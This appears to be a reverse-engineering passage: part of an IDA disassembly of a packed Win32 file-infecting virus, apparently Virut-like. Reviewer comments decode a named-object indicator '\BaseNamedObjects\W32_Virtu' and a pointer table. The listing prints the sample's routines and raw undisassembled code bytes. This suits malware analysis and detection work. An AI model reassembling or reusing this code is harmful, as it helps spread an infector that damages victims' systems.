; [ebp+403952h] (presumably restoring the original file attributes - the same
; pointer was called with 0 before the file was opened; TODO confirm).
    push dword ptr [ebp+403956h]
    call dword ptr [ebp+40353Ch]
loc_3150D5DC: ; CODE XREF: sub_3150D053+45j
    lea esi, [ebp+40384Eh]
    push dword ptr [ebp+403952h]
    push esi
    call dword ptr [ebp+4035B4h]
    and dword ptr [ebp+403956h], 0          ; mark "nothing open"
    retn
sub_3150D58F endp

; ---------------------------------------------------------------------------
; Undefined bytes up to the end of segment UPX2 (IDA left them as data).
; NOTE(review):
;  * the first dwords start with 0E8h / 5Dh, i.e. they look like further code
;    that was not disassembled - decode before drawing conclusions;
;  * the run of dwords containing 77E7h / 77F7h bytes is consistent with a
;    table of 32-bit pointers stored at an unaligned offset (presumably the
;    resolved pointers called through [ebp+4035xxh]) - verify;
;  * 380036h, 3150D90Ch is a length / maximum-length / buffer triple, and the
;    dwords from 42005Ch to 75h decode as the UTF-16LE string
;    "\BaseNamedObjects\W32_Virtu" (27 characters = 36h bytes). A named object
;    with that path is a candidate host indicator for this sample.
    db 0E8h
    dd 0
    dd 81016A5Dh, 403349EDh, 0FF05800h, 158085C1h, 0C0850040h
    dd 0FFC883C3h, 85C10FF0h, 401580h, 103DC3h, 1C75002Ah
    dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FB7EE805h
    dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
    dd 3975FFFFh, 3024448Bh, 384EB58Dh, 508B0040h, 3A816608h
    dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 35F895FFh
    dd 0C4830040h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFB2BE8h
    dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 10E8h
    dd 20C200h, 30B8h, 3E800h, 24C20000h, 24548D00h, 832ECD0Ch
    dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 13ED811Ah
    dd 0E8004034h, 0FFFFE539h, 4C261h, 3020601h, 22B30705h
    dd 60EFB400h, 10CC15FFh, 900100h, 3Fh dup(0)
    dd 63000000h, 0DE77E779h, 7D77E737h, 0FD77F515h, 77E7A5h
    dd 2 dup(0)
    dd 72000000h, 3777E746h, 9777E7A8h, 0B877E777h, 8377E61Bh
    dd 3777E7AAh, 0E777E7ACh, 4977EBB1h, 2477E73Ch, 0AB77E794h
    dd 0EF77E74Ch, 0E277E793h, 9377E73Ch, 8F77E79Fh, 3477E6AFh
    dd 8677E6ADh, 5777E7C4h, 0D877E7C6h, 7677E805h, 1577E74Dh
    dd 0B777E7C8h, 9577E706h, 0E977EBA5h, 9677EBA6h, 1A77E703h
    dd 0E677E701h, 4C77E61Bh, 9077E77Ch, 0A77E750h, 8C77E798h
    dd 6377E79Dh, 377F7E4h, 0A377F7E6h, 0B377F7E6h, 0D377F7E6h
    dd 7377F7E6h, 0F377F7EAh, 6377F7EAh, 4377F7EBh, 377F7ECh
    dd 3377F7F5h, 77F526h, 15h dup(0)
    dd 380036h, 3150D90Ch, 42005Ch, 730061h, 4E0065h, 6D0061h
    dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
    dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
    dd 6900h, 0Ch dup(0)
    dd 0FDF00000h, 7Fh, 18E5h dup(0)
UPX2 ends

; Section 4. (virtual address 00014000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00014000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
    assume cs:_idata2
    ;org 31514000h
    dd 80h dup(0)
    align 1000h
_idata2 ends

    end start